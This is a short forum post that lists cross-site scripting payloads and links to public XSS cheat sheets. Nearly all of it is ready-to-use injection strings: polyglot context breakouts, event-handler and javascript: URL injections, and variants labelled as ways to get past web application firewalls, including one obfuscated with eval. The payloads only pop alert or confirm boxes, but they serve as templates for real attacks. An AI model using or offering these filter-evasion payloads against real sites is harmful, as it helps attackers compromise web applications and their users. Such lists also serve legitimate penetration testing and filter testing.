
Some XSS payloads

JuanDeLemos:
Some XSS payload starts

<!'/*!"/*!//'/*//"/*--!>

or

>');'>%>?>">">\x22\x3e/*-->]]>

<!'/*!"/*!//'/*//"/*--!><Input/Autofocus/%0D*/Onfocus=confirm`1`//><Svg>

Fuck WAF
<script>a=xss<!--<script/\;</script><input value="${alert(1)}`</script/">

Fuck WAF with string obfuscation
<script>eval(ale${[[[[]=[]]=[[]=[]]]=[[]=[]]]=[]}rt(666));</script/">

XSS in href link
<a href="" onclick=``/name==alert(1)>clickme1</a>

or
<a href="" onclick=``/*/alt="*//alert(1)//">clickme2</a>

Rewrite page
<a href="javascript:document.write('c========3'); void(0);">Middle-click me</a>

New test
  '\"--!><Body /Onpageshow=confirm`1`>

"-->'><script>alert(1);</script>"

List of different XSS cheat sheets:

- Big collection of XSS payloads: https://github.com/foospidy/payloads/blob/master/other/xss/rafaybaloch.txt
- OWASP XSS Filter Evasion Cheat Sheet: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
- HTML5 Security Cheatsheet: https://html5sec.org
- Brutelogic cheat sheet: http://brutelogic.com.br/blog/cheat-sheet/
- XSS Payloads: http://www.xss-payloads.com/index.html
